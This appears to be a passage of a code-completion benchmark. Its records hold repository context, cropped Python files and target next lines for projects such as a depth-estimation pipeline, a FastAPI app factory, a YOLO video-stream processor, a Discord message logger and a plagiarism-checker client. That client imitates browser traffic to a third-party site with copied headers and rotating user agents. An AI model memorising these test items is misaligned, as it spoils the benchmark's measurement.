self.rgb_encoder = RGBEncoder(
pretrained_path=rgb_encoder_pretrained_path["path"],
subfolder=rgb_encoder_pretrained_path["subfolder"],
)
logging.info(
f"pretrained RGBEncoder loaded from: {rgb_encoder_pretrained_path}"
)
self.rgb_encoder.requires_grad_(False)
# Depth encoder-decoder
| # Author: Bingxin Ke
# Last modified: 2023-12-11
class MarigoldPipeline(nn.Module):
"""
Marigold monocular depth estimator.
"""
def __init__(
self,
unet_pretrained_path: Dict, # {path: xxx, subfolder: xxx}
rgb_encoder_pretrained_path: Dict,
depht_ae_pretrained_path: Dict,
noise_scheduler_pretrained_path: Dict,
tokenizer_pretrained_path: Dict,
text_encoder_pretrained_path: Dict,
empty_text_embed=None,
trainable_unet=False,
rgb_latent_scale_factor=0.18215,
depth_latent_scale_factor=0.18215,
noise_scheduler_type="DDIMScheduler",
enable_gradient_checkpointing=False,
enable_xformers=True,
) -> None:
super().__init__()
self.rgb_latent_scale_factor = rgb_latent_scale_factor
self.depth_latent_scale_factor = depth_latent_scale_factor
self.device = "cpu"
# ******* Initialize modules *******
# Trainable modules
self.trainable_module_dic: Dict[str, nn.Module] = {}
self.trainable_unet = trainable_unet
# Denoising UNet
self.unet: UNet2DConditionModel = UNet2DConditionModel.from_pretrained(
unet_pretrained_path["path"], subfolder=unet_pretrained_path["subfolder"]
)
logging.info(f"pretrained UNet loaded from: {unet_pretrained_path}")
if 8 != self.unet.config["in_channels"]:
self._replace_unet_conv_in()
logging.warning("Unet conv_in layer is replaced")
if enable_xformers:
self.unet.enable_xformers_memory_efficient_attention()
else:
self.unet.disable_xformers_memory_efficient_attention()
# Image encoder
self.rgb_encoder = RGBEncoder(
pretrained_path=rgb_encoder_pretrained_path["path"],
subfolder=rgb_encoder_pretrained_path["subfolder"],
)
logging.info(
f"pretrained RGBEncoder loaded from: {rgb_encoder_pretrained_path}"
)
self.rgb_encoder.requires_grad_(False)
# Depth encoder-decoder | self.depth_ae = StackedDepthAE( | 1 | 2023-12-15 07:19:14+00:00 | 2k |
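Earlier in this record the pipeline swaps `unet.conv_in` for an 8-channel layer so the concatenated RGB and depth latents fit, but `_replace_unet_conv_in` itself is not shown. The sketch below shows one common way to widen a pretrained convolution; the duplicate-and-halve initialisation is an assumption for illustration, not the repository's confirmed policy.

```python
import torch
from torch import nn

old_conv = nn.Conv2d(4, 320, kernel_size=3, padding=1)  # stand-in for unet.conv_in

new_conv = nn.Conv2d(8, 320, kernel_size=3, padding=1)
with torch.no_grad():
    # Repeat the pretrained kernel across the new input channels and halve it so the
    # layer's expected output magnitude is preserved when both halves carry signal.
    new_conv.weight.copy_(old_conv.weight.repeat(1, 2, 1, 1) * 0.5)
    new_conv.bias.copy_(old_conv.bias)

x = torch.randn(1, 8, 64, 64)   # concatenated rgb_latent + depth_latent
print(new_conv(x).shape)        # -> torch.Size([1, 320, 64, 64])
```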
tungeverest/python-k8s-base | src/app.py | [
{
"identifier": "process_time_log_middleware",
"path": "core/middlewares/https/process_time.py",
"snippet": "async def process_time_log_middleware(request: Request, call_next):\n \"\"\"\n This middleware will log all requests and their processing time.\n E.g. log: HOST:PORT - GET /ping 200 OK 1.00ms\n \"\"\"\n logging.debug(\"middleware: process_time_log_middleware\")\n url = f\"{request.method}: {request.url.path}?{request.query_params}\" if request.query_params else request.url.path\n start_time = time.time()\n response = await call_next(request)\n process_time = (time.time() - start_time) * 1000\n formatted_process_time = \"{0:.2f}\".format(process_time)\n host = getattr(getattr(request, \"client\", None), \"host\", None)\n port = getattr(getattr(request, \"client\", None), \"port\", None)\n response.headers[\"X-Process-Time\"] = formatted_process_time\n try:\n status_phrase = http.HTTPStatus(response.status_code).phrase\n except ValueError:\n status_phrase=\"\"\n logging.info(f'{host}:{port} - \"{request.method} {url}\" {response.status_code} {status_phrase} {formatted_process_time}ms')\n return response"
},
{
"identifier": "RateLimitCoreMiddleware",
"path": "core/middlewares/https/rate_limit.py",
"snippet": "class RateLimitCoreMiddleware(BaseHTTPMiddleware):\n # TODO apply = Redis\n RATE_LIMIT_DURATION = timedelta(seconds=10)\n RATE_LIMIT_REQUESTS = 5\n\n def __init__(self, app):\n super().__init__(app)\n # Dictionary to store request counts for each IP\n self.request_counts = {}\n\n async def dispatch(self, request: Request, call_next):\n # Get the client's IP address\n client_ip = request.client.host\n\n # Check if IP is already present in request_counts\n request_count, last_request = self.request_counts.get(client_ip, (0, datetime.min))\n\n # Calculate the time elapsed since the last request\n elapsed_time = datetime.now() - last_request\n\n if elapsed_time > self.RATE_LIMIT_DURATION:\n request_count = 1\n else:\n if request_count >= self.RATE_LIMIT_REQUESTS:\n return JSONResponse(\n status_code=429,\n content={\"detail\": \"Rate limit exceeded. Please try again later.\"}\n )\n request_count += 1\n\n # Update the request count and last request timestamp for the IP\n self.request_counts[client_ip] = (request_count, datetime.now())\n\n response = await call_next(request)\n return response"
},
{
"identifier": "router",
"path": "src/router.py",
"snippet": "def index():"
},
{
"identifier": "get_settings",
"path": "src/setting.py",
"snippet": "@lru_cache()\ndef get_settings() -> CoreSettings:\n if getenv(\"_ENV\", None) is None:\n raise Exception(\"Cannot get _ENV environment\")\n return CustomSettings()"
}
] | import logging
from os import getenv
from core.middlewares.https.process_time import process_time_log_middleware
from core.middlewares.https.rate_limit import RateLimitCoreMiddleware
from fastapi import FastAPI
from fastapi.middleware.cors import CORSMiddleware
from fastapi.middleware.trustedhost import TrustedHostMiddleware
from src.router import router as api_router
from src.setting import get_settings | 881 |
logger = logging.getLogger(__name__)
def create_app():
settings = get_settings()
app = FastAPI(
title=f"{settings.PROJECT_NAME}",
version=settings.APP_VERSION,
debug=settings.DEBUG,
description=f"""
FastAPI Framework + K8s \n
- PROJECT NAME: {settings.PROJECT_NAME} \n
- VERSION: {settings.APP_VERSION} \n
- ENV: {settings._ENV} \n
- DEBUG: {settings.DEBUG} \n
- API URI: {settings.API_VERSION_PREFIX} \n
""",
)
|
logger = logging.getLogger(__name__)
def create_app():
settings = get_settings()
app = FastAPI(
title=f"{settings.PROJECT_NAME}",
version=settings.APP_VERSION,
debug=settings.DEBUG,
description=f"""
FastAPI Framework + K8s \n
- PROJECT NAME: {settings.PROJECT_NAME} \n
- VERSION: {settings.APP_VERSION} \n
- ENV: {settings._ENV} \n
- DEBUG: {settings.DEBUG} \n
- API URI: {settings.API_VERSION_PREFIX} \n
""",
) | app.include_router(api_router, prefix=settings.API_VERSION_PREFIX) | 1 | 2023-12-20 03:40:34+00:00 | 2k |
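The completion mounts the API router onto the freshly built app under the versioned prefix from settings. A stripped-down version of that factory pattern is sketched below; the `Settings` dataclass is a simplified stand-in for the project's pydantic-based configuration.

```python
from dataclasses import dataclass
from typing import Optional

from fastapi import APIRouter, FastAPI


@dataclass
class Settings:
    PROJECT_NAME: str = "example-service"
    APP_VERSION: str = "0.1.0"
    API_VERSION_PREFIX: str = "/api/v1"


router = APIRouter()


@router.get("/ping")
def ping() -> dict:
    return {"status": "ok"}


def create_app(settings: Optional[Settings] = None) -> FastAPI:
    settings = settings or Settings()
    app = FastAPI(title=settings.PROJECT_NAME, version=settings.APP_VERSION)
    # Mirrors the record's completion: mount the router under the versioned prefix.
    app.include_router(router, prefix=settings.API_VERSION_PREFIX)
    return app


app = create_app()  # e.g. serve with: uvicorn my_module:app --reload
```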
CoolPointerException/Amigo | gui/llama_index_init.py | [
{
"identifier": "validate",
"path": "gui/input_validator.py",
"snippet": "def validate(gui, properties):\n for prop in properties:\n match prop:\n case Properties.PROJECT_NAME:\n project_name = gui.projects_tab.project_name_entry.get()\n if not project_name:\n messagebox.showerror(\"Error\", \"Please enter a project name.\")\n return False\n\n if project_name in forbidden_names:\n messagebox.showerror(\"Error\", \"Please enter a valid project name. \\nForbidden names:\\n - \" + \"\\n - \"\n .join(forbidden_names))\n return False\n case Properties.SELECTED_DIRECTORY:\n selected_directory = gui.projects_tab.selected_directory\n if not selected_directory:\n messagebox.showerror(\"Error\", \"Please select a directory.\")\n return False\n case Properties.API_TYPE:\n api_type = gui.settings_tab.api_type.get()\n if not api_type:\n messagebox.showerror(\"Error\", \"Please select API type in Settings Tab.\")\n return False\n case Properties.API_BASE:\n api_base = gui.settings_tab.api_host_entry.get()\n if not api_base:\n messagebox.showerror(\"Error\", \"Please enter API base in Settings Tab.\")\n return False\n case Properties.API_VERSION:\n api_version = gui.settings_tab.api_version_entry.get()\n if not api_version:\n messagebox.showerror(\"Error\", \"Please enter API version in Settings Tab.\")\n return False\n case Properties.API_KEY:\n api_key = gui.settings_tab.api_key_entry.get()\n if not api_key:\n messagebox.showerror(\"Error\", \"Please enter API key in Settings Tab.\")\n return False\n case Properties.GPT_MODEL:\n gpt_model = gui.settings_tab.gpt_model.get()\n if not gpt_model:\n messagebox.showerror(\"Error\", \"Please enter GPT model name in Settings Tab.\")\n return False\n case Properties.GPT_DEPLOYMENT:\n gpt_deployment = gui.settings_tab.gpt_deployment.get()\n if not gpt_deployment:\n messagebox.showerror(\"Error\", \"Please enter GPT deployment name in Settings Tab.\")\n return False\n case Properties.EMBEDDING_MODEL:\n embedding_model = gui.settings_tab.embeddings_model_entry.get()\n if not embedding_model:\n messagebox.showerror(\"Error\", \"Please enter embedding model name in Settings Tab.\")\n return False\n case Properties.EMBEDDING_DEPLOYMENT:\n embedding_deployment = gui.settings_tab.embeddings_deployment_entry.get()\n if not embedding_deployment:\n messagebox.showerror(\"Error\", \"Please enter embedding deployment name in Settings Tab.\")\n return False\n case Properties.PROMPT:\n prompt = gui.settings_tab.prompt_entry.get(\"1.0\", tk.END)\n if not prompt:\n messagebox.showerror(\"Error\", \"Please enter a prompt in Settings Tab.\")\n return False\n case Properties.MAX_TOKENS:\n max_tokens = gui.settings_tab.max_tokens.get()\n if not max_tokens:\n messagebox.showerror(\"Error\", \"Please enter max tokens in Settings Tab.\")\n return False\n case Properties.TASK_REQUIREMENTS:\n task_requirements = gui.task_tab.task_requirements_entry.get(\"1.0\", tk.END)\n if not task_requirements:\n messagebox.showerror(\"Error\", \"Please enter a Task requirements.\")\n return False\n case Properties.SELECTED_PROJECT:\n selected_project = gui.task_tab.selected_project.get()\n if not selected_project:\n messagebox.showerror(\"Error\", \"Please select a project.\")\n return False\n case Properties.THREADS:\n threads = gui.settings_tab.threads.get()\n if not threads:\n messagebox.showerror(\"Error\", \"Please enter number of threads in Settings Tab.\")\n return False\n case Properties.REINDEX_PROJECT:\n reindex_project = gui.projects_tab.reindex_project.get()\n if not reindex_project:\n messagebox.showerror(\"Error\", \"Please select a project to 
reindex.\")\n return False\n return True"
},
{
"identifier": "Properties",
"path": "gui/input_validator.py",
"snippet": "class Properties(Enum):\n PROJECT_NAME = 1\n SELECTED_DIRECTORY = 2\n API_TYPE = 3\n API_BASE = 4\n API_VERSION = 5\n API_KEY = 6\n GPT_MODEL = 7\n GPT_DEPLOYMENT = 8\n EMBEDDING_MODEL = 9\n EMBEDDING_DEPLOYMENT = 10\n PROMPT = 11\n MAX_TOKENS = 12\n TASK_REQUIREMENTS = 13\n SELECTED_PROJECT = 14\n THREADS = 15\n REINDEX_PROJECT = 16"
}
] | from tkinter import messagebox
from llama_index import ServiceContext, set_global_service_context, OpenAIEmbedding
from llama_index.embeddings import AzureOpenAIEmbedding, GeminiEmbedding
from llama_index.llms import Gemini, OpenAI, AzureOpenAI
from gui.input_validator import validate, Properties | 1,186 |
def init_llama_index(self, api_type):
if self.isLlamaInitialized:
return
llm = None
embed_model = None
if api_type == "azure":
is_valid = validate(self, [
|
def init_llama_index(self, api_type):
if self.isLlamaInitialized:
return
llm = None
embed_model = None
if api_type == "azure":
is_valid = validate(self, [ | Properties.API_BASE, | 1 | 2023-12-15 14:06:38+00:00 | 2k |
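Before talking to Azure, the record's code runs an enum-driven checklist over the GUI fields via `validate(self, [...])`. The sketch below reproduces that idea without tkinter, using a plain settings dict and console messages, so treat it as an illustration of the pattern rather than the application's code.

```python
from enum import Enum, auto


class Properties(Enum):
    API_TYPE = auto()
    API_BASE = auto()
    API_VERSION = auto()
    API_KEY = auto()


MESSAGES = {
    Properties.API_TYPE: "Please select API type in Settings Tab.",
    Properties.API_BASE: "Please enter API base in Settings Tab.",
    Properties.API_VERSION: "Please enter API version in Settings Tab.",
    Properties.API_KEY: "Please enter API key in Settings Tab.",
}


def validate(settings: dict, required: list[Properties]) -> bool:
    for prop in required:
        if not settings.get(prop):          # missing or empty -> fail with a message
            print(f"Error: {MESSAGES[prop]}")
            return False
    return True


settings = {Properties.API_TYPE: "azure", Properties.API_BASE: "https://example.openai.azure.com"}
print(validate(settings, [Properties.API_TYPE, Properties.API_BASE]))     # True
print(validate(settings, [Properties.API_BASE, Properties.API_VERSION]))  # False, with message
```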
redvulpecula/DRILL-Concurrent-Python-1 | main.py | [
{
"identifier": "VideoStream",
"path": "video_streaming.py",
"snippet": "class VideoStream:\n def __init__(self, url, frames):\n self.frames = frames\n self.url = url\n self.process = Process(target=self.capture, args=(self.frames, self.url))\n self.process.start()\n\n def capture(self, frames, url):\n cap = cv2.VideoCapture(url)\n error_reported = False\n last_success_time = time.time()\n video_count = 0 \n initial_connection_made = False \n\n while True:\n ret, frame = cap.read()\n if not ret:\n if time.time() - last_success_time > 60:\n print(\"Cannot connect to stream for more than 1 minute. Exiting.\")\n break\n if not error_reported:\n if initial_connection_made: \n video_count += 1 \n print(f\"Finished streaming video number {video_count}.\")\n print(\"Attempting to reconnect to the next video...\")\n error_reported = True\n last_success_time = time.time() \n cap.release()\n cap = cv2.VideoCapture(url)\n continue\n \n if not initial_connection_made:\n initial_connection_made = True \n\n error_reported = False\n if not frames.full():\n frames.put(frame)\n\n\n def get_frame(self):\n if not self.frames.empty():\n return self.frames.get()\n\n def release(self):\n self.process.terminate()\n self.process.join()"
},
{
"identifier": "calculate_fps",
"path": "video_streaming.py",
"snippet": "def calculate_fps(prev_time, fps):\n while True:\n curr_time = time.time()\n time_diff = curr_time - prev_time\n if time_diff != 0: # Avoid divide by 0 error\n fps.value = 1 / time_diff\n prev_time = curr_time"
},
{
"identifier": "display_and_save_frame",
"path": "video_streaming.py",
"snippet": "def display_and_save_frame(fps_async, fps_stream, frames):\n prev_time = time.time()\n while True:\n frame = frames.get()\n if frame is None:\n break\n curr_time = time.time()\n time_diff = curr_time - prev_time\n if time_diff != 0:\n fps_stream.value = 1 / time_diff\n prev_time = curr_time\n display_fps(frame, fps_async, fps_stream)\n cv2.imshow('RTSP Stream', frame)\n if cv2.getWindowProperty('RTSP Stream', cv2.WND_PROP_VISIBLE) < 1:\n break\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break"
},
{
"identifier": "check_rtsp_url",
"path": "video_streaming.py",
"snippet": "def check_rtsp_url(url):\n parsed_url = urlparse(url)\n host = parsed_url.hostname\n port = parsed_url.port if parsed_url.port else 554 \n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n try:\n sock.connect((host, port))\n sock.close()\n return True\n except socket.error:\n return False"
},
{
"identifier": "read_url_from_file",
"path": "video_streaming.py",
"snippet": "def read_url_from_file(file_path='source.txt'):\n with open(file_path, 'r') as file:\n return file.readline().strip()"
},
{
"identifier": "YOLOProcessor",
"path": "imgAlgSelect.py",
"snippet": "class YOLOProcessor:\n def __init__(self, frames, yolo_model, device, verbose=False):\n self.frames = frames\n self.yolo_model = yolo_model\n self.device = device\n self.verbose = verbose\n\n def process(self):\n while True:\n frame = self.frames.get()\n \n if frame is None:\n break\n\n results = self.yolo_model(frame, device=self.device, verbose=self.verbose)\n result = results[0]\n bboxes = np.array(result.boxes.xyxy.cpu(), dtype=\"int\")\n classes = np.array(result.boxes.cls.cpu(), dtype=\"int\")\n\n for cls, bbox in zip(classes, bboxes):\n (x, y, x2, y2) = bbox\n cv2.rectangle(frame, (x, y), (x2, y2), (0, 0, 225), 2)\n cv2.putText(frame, str(cls), (x, y - 5), cv2.FONT_HERSHEY_PLAIN, 2, (0, 0, 225), 2)\n cv2.imshow('YOLO Model', frame)\n if cv2.getWindowProperty('YOLO Model', cv2.WND_PROP_VISIBLE) < 1:\n break\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break"
}
] | import time
import torch
from multiprocessing import Process, Manager
from ultralytics import YOLO
from video_streaming import VideoStream, calculate_fps, display_and_save_frame, check_rtsp_url, read_url_from_file
from imgAlgSelect import YOLOProcessor | 1,420 |
class ConcurrencyManager:
def __init__(self, url):
self.device = 'cuda' if torch.backends.cuda.is_built() else 'mps' if torch.backends.mps.is_available() else 'cpu'
self.yolo_model = YOLO("yolov8m.pt")
self.manager = Manager()
self.url = url
self.frames = self.manager.Queue(maxsize=1)
self.video_stream = VideoStream(url, self.frames)
self.fps_async = self.manager.Value('d', 0.0)
self.fps_stream = self.manager.Value('d', 0.0)
def start_stream(self):
print("Waiting for the stream.")
while not check_rtsp_url(self.url):
print("Cannot connect to the URL or the port is not open. Retrying.")
p_fps = Process(target=calculate_fps, args=(time.time(), self.fps_async))
p_fps.start()
p_display = Process(target=display_and_save_frame, args=(self.fps_async, self.fps_stream, self.video_stream.frames))
p_display.start()
p_yolo = Process(target=YOLOProcessor(self.video_stream.frames, self.yolo_model, self.device).process)
p_yolo.start()
p_display.join()
p_fps.join()
p_yolo.join()
self.video_stream.release()
def main():
|
class ConcurrencyManager:
def __init__(self, url):
self.device = 'cuda' if torch.backends.cuda.is_built() else 'mps' if torch.backends.mps.is_available() else 'cpu'
self.yolo_model = YOLO("yolov8m.pt")
self.manager = Manager()
self.url = url
self.frames = self.manager.Queue(maxsize=1)
self.video_stream = VideoStream(url, self.frames)
self.fps_async = self.manager.Value('d', 0.0)
self.fps_stream = self.manager.Value('d', 0.0)
def start_stream(self):
print("Waiting for the stream.")
while not check_rtsp_url(self.url):
print("Cannot connect to the URL or the port is not open. Retrying.")
p_fps = Process(target=calculate_fps, args=(time.time(), self.fps_async))
p_fps.start()
p_display = Process(target=display_and_save_frame, args=(self.fps_async, self.fps_stream, self.video_stream.frames))
p_display.start()
p_yolo = Process(target=YOLOProcessor(self.video_stream.frames, self.yolo_model, self.device).process)
p_yolo.start()
p_display.join()
p_fps.join()
p_yolo.join()
self.video_stream.release()
def main(): | url = read_url_from_file() | 4 | 2023-12-18 02:58:03+00:00 | 2k |
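The record's `ConcurrencyManager` shares a `Manager` queue of size one between a capture process and its consumers, and the producer drops frames rather than block when the queue is full. The self-contained sketch below reproduces that layout with integers standing in for frames, so no OpenCV or camera is needed.

```python
import time
from multiprocessing import Manager, Process


def capture(frames) -> None:
    for frame in range(20):
        if not frames.full():   # drop the frame instead of blocking, as VideoStream does
            frames.put(frame)
        time.sleep(0.01)
    frames.put(None)            # sentinel: the stream is finished


def display(frames) -> None:
    while True:
        frame = frames.get()
        if frame is None:
            break
        print(f"processed frame {frame}")


if __name__ == "__main__":
    manager = Manager()                 # kept alive for the lifetime of the queue
    frames = manager.Queue(maxsize=1)
    workers = [Process(target=capture, args=(frames,)),
               Process(target=display, args=(frames,))]
    for worker in workers:
        worker.start()
    for worker in workers:
        worker.join()
```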
LyubomirT/discord-lle | main.py | [
{
"identifier": "Colorizer",
"path": "colorizer.py",
"snippet": "class Colorizer:\n def __init__(self, color):\n self.color = color\n self.colors = {\n \"red\": \"\\033[31m\",\n \"green\": \"\\033[32m\",\n \"yellow\": \"\\033[33m\",\n \"blue\": \"\\033[34m\",\n \"magenta\": \"\\033[35m\",\n \"cyan\": \"\\033[36m\",\n \"white\": \"\\033[37m\",\n \"orange\": \"\\033[38;5;208m\",\n \"purple\": \"\\033[38;5;135m\",\n \"pink\": \"\\033[38;5;219m\",\n \"grey\": \"\\033[38;5;246m\",\n \"reset\": \"\\033[0m\"\n }\n if self.color not in self.colors:\n raise Exception(\"Color not found\")\n \n def colorize(self, text):\n return self.colors[self.color] + text + self.colors[\"reset\"]"
},
{
"identifier": "verify_dir",
"path": "verify_dir.py",
"snippet": "def verify_dir(log_dir):\n # Fully verify the directory structure\n # If it doesn't exist, create it\n # If it does exist, make sure it is empty or follows the correct format\n\n # Check if the log directory exists\n if not os.path.exists(log_dir):\n os.mkdir(log_dir)\n print(Colorizer(\"cyan\").colorize(\"Log directory created.\"))\n else:\n print(Colorizer(\"cyan\").colorize(\"Log directory already exists. In use.\"))\n \n # Check if the DM directory exists\n if not os.path.exists(log_dir + \"/DMs\"):\n os.mkdir(log_dir + \"/DMs\")\n \n # Check if the server directory exists\n if not os.path.exists(log_dir + \"/Servers\"):\n os.mkdir(log_dir + \"/Servers\")\n\n # Check if the DM directory is empty\n if not os.listdir(log_dir + \"/DMs\"):\n print(Colorizer(\"cyan\").colorize(\"DM directory is empty.\"))\n else:\n print(Colorizer(\"cyan\").colorize(\"DM directory contains log files / other files.\"))\n \n # Check if the server directory is empty\n if not os.listdir(log_dir + \"/Servers\"):\n print(Colorizer(\"cyan\").colorize(\"Server directory is empty.\"))\n else:\n print(Colorizer(\"cyan\").colorize(\"Server directory contains log files / other files.\"))"
}
] | from dotenv import load_dotenv
from discord.ext import commands
from discord.commands import Option
from discord.ui import Button, View, Select, Modal
from colorizer import Colorizer
from datetime import datetime
from verify_dir import verify_dir
import os
import requests
import json
import discord
import configparser
import asyncio | 1,460 |
load_dotenv()
token = os.getenv("BOT_TOKEN")
bot = commands.Bot(command_prefix="!", intents=discord.Intents.all())
log_dir = "_logs_"
dm_config = {
"enabled": True,
"download_images": True,
"download_videos": True,
"download_audio": True,
}
server_config = {
"enabled": True,
"download_images": True,
"download_videos": True,
"download_audio": True,
}
printContents = False
logtodms = False
ownerid = 0
def load_config():
with open("_config_/directories.cfg", "r") as f:
try:
config = configparser.ConfigParser()
config.read_file(f)
except:
print(Colorizer("red").colorize("Could not load config! The directories.cfg file is missing or corrupt."))
os._exit(1)
global log_dir
try:
log_dir = config["directories"]["log_dir"]
except:
print(Colorizer("red").colorize("Could not load config! Please specify a proper log directory or use cfg_gen.py to generate a new config file."))
os._exit(1)
with open("_config_/types.cfg", "r") as f:
try:
config = configparser.ConfigParser()
config.read_file(f)
except:
print(Colorizer("red").colorize("Could not load config! The types.cfg file is missing or corrupt."))
os._exit(1)
global dm_config
try:
dm_config["enabled"] = bool(config["direct_messages"]["enabled"])
dm_config["download_images"] = bool(config["direct_messages"]["download_images"])
dm_config["download_videos"] = bool(config["direct_messages"]["download_videos"])
dm_config["download_audio"] = bool(config["direct_messages"]["download_audio"])
except:
print(Colorizer("red").colorize("Could not load config! Please specify proper types (DM) or use cfg_gen.py to generate a new config file."))
os._exit(1)
global server_config
try:
server_config["enabled"] = bool(config["servers"]["enabled"])
server_config["download_images"] = bool(config["servers"]["download_images"])
server_config["download_videos"] = bool(config["servers"]["download_videos"])
server_config["download_audio"] = bool(config["servers"]["download_audio"])
except:
print(Colorizer("red").colorize("Could not load config! Please specify proper types (server) or use cfg_gen.py to generate a new config file."))
os._exit(1)
with open("_config_/misc.cfg", "r") as f:
try:
config = configparser.ConfigParser()
config.read_file(f)
except:
print(Colorizer("red").colorize("Could not load config! The misc.cfg file is missing or corrupt."))
os._exit(1)
global printContents
try:
printContents = bool(config["Console"]["printContents"])
except:
print(Colorizer("red").colorize("Could not load config! Please specify proper misc options (printContents) or use cfg_gen.py to generate a new config file."))
os._exit(1)
global logtodms
try:
logtodms = bool(config["DiscordLog"]["enabled"])
except:
print(Colorizer("red").colorize("Could not load config! Please specify proper misc options (logtodms) or use cfg_gen.py to generate a new config file."))
os._exit(1)
global ownerid
try:
ownerid = int(config["DiscordLog"]["ownerid"])
except:
print(Colorizer("red").colorize("Could not load config! Please specify proper misc options (ownerid) or use cfg_gen.py to generate a new config file."))
os._exit(1)
|
load_dotenv()
token = os.getenv("BOT_TOKEN")
bot = commands.Bot(command_prefix="!", intents=discord.Intents.all())
log_dir = "_logs_"
dm_config = {
"enabled": True,
"download_images": True,
"download_videos": True,
"download_audio": True,
}
server_config = {
"enabled": True,
"download_images": True,
"download_videos": True,
"download_audio": True,
}
printContents = False
logtodms = False
ownerid = 0
def load_config():
with open("_config_/directories.cfg", "r") as f:
try:
config = configparser.ConfigParser()
config.read_file(f)
except:
print(Colorizer("red").colorize("Could not load config! The directories.cfg file is missing or corrupt."))
os._exit(1)
global log_dir
try:
log_dir = config["directories"]["log_dir"]
except:
print(Colorizer("red").colorize("Could not load config! Please specify a proper log directory or use cfg_gen.py to generate a new config file."))
os._exit(1)
with open("_config_/types.cfg", "r") as f:
try:
config = configparser.ConfigParser()
config.read_file(f)
except:
print(Colorizer("red").colorize("Could not load config! The types.cfg file is missing or corrupt."))
os._exit(1)
global dm_config
try:
dm_config["enabled"] = bool(config["direct_messages"]["enabled"])
dm_config["download_images"] = bool(config["direct_messages"]["download_images"])
dm_config["download_videos"] = bool(config["direct_messages"]["download_videos"])
dm_config["download_audio"] = bool(config["direct_messages"]["download_audio"])
except:
print(Colorizer("red").colorize("Could not load config! Please specify proper types (DM) or use cfg_gen.py to generate a new config file."))
os._exit(1)
global server_config
try:
server_config["enabled"] = bool(config["servers"]["enabled"])
server_config["download_images"] = bool(config["servers"]["download_images"])
server_config["download_videos"] = bool(config["servers"]["download_videos"])
server_config["download_audio"] = bool(config["servers"]["download_audio"])
except:
print(Colorizer("red").colorize("Could not load config! Please specify proper types (server) or use cfg_gen.py to generate a new config file."))
os._exit(1)
with open("_config_/misc.cfg", "r") as f:
try:
config = configparser.ConfigParser()
config.read_file(f)
except:
print(Colorizer("red").colorize("Could not load config! The misc.cfg file is missing or corrupt."))
os._exit(1)
global printContents
try:
printContents = bool(config["Console"]["printContents"])
except:
print(Colorizer("red").colorize("Could not load config! Please specify proper misc options (printContents) or use cfg_gen.py to generate a new config file."))
os._exit(1)
global logtodms
try:
logtodms = bool(config["DiscordLog"]["enabled"])
except:
print(Colorizer("red").colorize("Could not load config! Please specify proper misc options (logtodms) or use cfg_gen.py to generate a new config file."))
os._exit(1)
global ownerid
try:
ownerid = int(config["DiscordLog"]["ownerid"])
except:
print(Colorizer("red").colorize("Could not load config! Please specify proper misc options (ownerid) or use cfg_gen.py to generate a new config file."))
os._exit(1)
| verify_dir(log_dir) | 1 | 2023-12-18 16:08:05+00:00 | 2k |
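One detail worth knowing when reading `load_config` above: `bool()` on a raw configparser string treats any non-empty value, including `"False"`, as true. The sketch below shows the parser's own boolean handling; the sample config text is invented, though the section and option names mirror the record's `types.cfg`.

```python
import configparser

SAMPLE = """
[direct_messages]
enabled = False
download_images = yes

[servers]
enabled = true
"""

config = configparser.ConfigParser()
config.read_string(SAMPLE)

dm_enabled = config.getboolean("direct_messages", "enabled")          # "False" -> False
dm_images = config.getboolean("direct_messages", "download_images")   # "yes"   -> True
server_audio = config.getboolean("servers", "download_audio", fallback=True)  # missing -> default

print(dm_enabled, dm_images, server_audio)  # False True True
```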
KR1470R/plagiator-py | utils/plagiator.py | [
{
"identifier": "exists",
"path": "utils/exists.py",
"snippet": "def exists(obj, *keys):\n format_keys = \"\".join(\n list(map(\n lambda key: f\"['{key}']\",\n keys\n ))\n )\n try:\n return eval(f\"obj{format_keys}\")\n except Exception:\n return None"
},
{
"identifier": "API_URI",
"path": "configs/edupirdie.py",
"snippet": "API_URI = \"https://edubirdie.com/plagiarism-checker-send-data\""
},
{
"identifier": "HEADERS",
"path": "configs/edupirdie.py",
"snippet": "HEADERS = {\n \"Host\": \"edubirdie.com\",\n \"Accept\": \"*/*\",\n \"Accept-Language\": \"en-US,en;q=0.5\",\n \"Accept-Encoding\": \"gzip\",\n \"Content-Type\": \"application/x-www-form-urlencoded; charset=UTF-8\",\n \"Referer\": \"https://edubirdie.com/perevirka-na-plagiat\",\n \"X-Requested-With\": \"XMLHttpRequest\",\n \"Origin\": \"https://edubirdie.com\",\n \"DNT\": \"1\",\n \"Sec-Fetch-Dest\": \"empty\",\n \"Sec-Fetch-Mode\": \"cors\",\n \"Sec-Fetch-Site\": \"same-origin\",\n \"Connection\": \"keep-alive\",\n \"Pragma\": \"no-cache\",\n \"Cache-Control\": \"no-cache\",\n}"
}
] | import json
import logging
import requests
from .exists import exists
from configs.edupirdie import API_URI, HEADERS
from random_user_agent.user_agent import UserAgent
from random_user_agent.params import SoftwareName, OperatingSystem | 844 |
class Plagiator:
def __init__(self):
self.session = requests.Session()
adapter = requests.adapters.HTTPAdapter(pool_connections=10000, pool_maxsize=10000)
self.session.mount("https://", adapter)
software_names = [software_name.value for software_name in SoftwareName]
operating_systems = [operating_system.value for operating_system in OperatingSystem]
self.user_agent_rotator = UserAgent(
software_names=software_names,
operating_systems=operating_systems,
limit=1000
)
def concretize_response(self, response: dict):
if exists(response, "error") and response["error"]:
return response
del response["error"]
del response["error_code"]
if len(response["title"]) == 0:
del response["title"]
words = response["text"].split(" ")
if exists(response, "highlight") and len(response["highlight"]):
highlight_text = []
for span in response["highlight"]:
span = list(map(int, span))
selected_words = words[span[0]] if (
span[0] == span[1]
) else words[span[0]:span[1]]
if isinstance(selected_words, list):
selected_words = " ".join(selected_words)
highlight_text.append(selected_words)
response["highlight"] = highlight_text
if exists(response, "matches") and len(response["matches"]):
matches_highlight = []
for match in response["matches"]:
matched_highlight_text = []
for match_span in match["highlight"]:
match_span = list(map(int, match_span))
selected_words = words[match_span[0]] if (
match_span[0] == match_span[1]
) else words[match_span[0]:match_span[1]]
if isinstance(selected_words, list):
selected_words = " ".join(selected_words)
matched_highlight_text.append(selected_words)
matches_highlight.append({**match, "highlight": matched_highlight_text})
response["matches"] = matches_highlight
return response
def __request__(self, text: str, title: str = None):
return self.session.post(
API_URI,
headers={
|
class Plagiator:
def __init__(self):
self.session = requests.Session()
adapter = requests.adapters.HTTPAdapter(pool_connections=10000, pool_maxsize=10000)
self.session.mount("https://", adapter)
software_names = [software_name.value for software_name in SoftwareName]
operating_systems = [operating_system.value for operating_system in OperatingSystem]
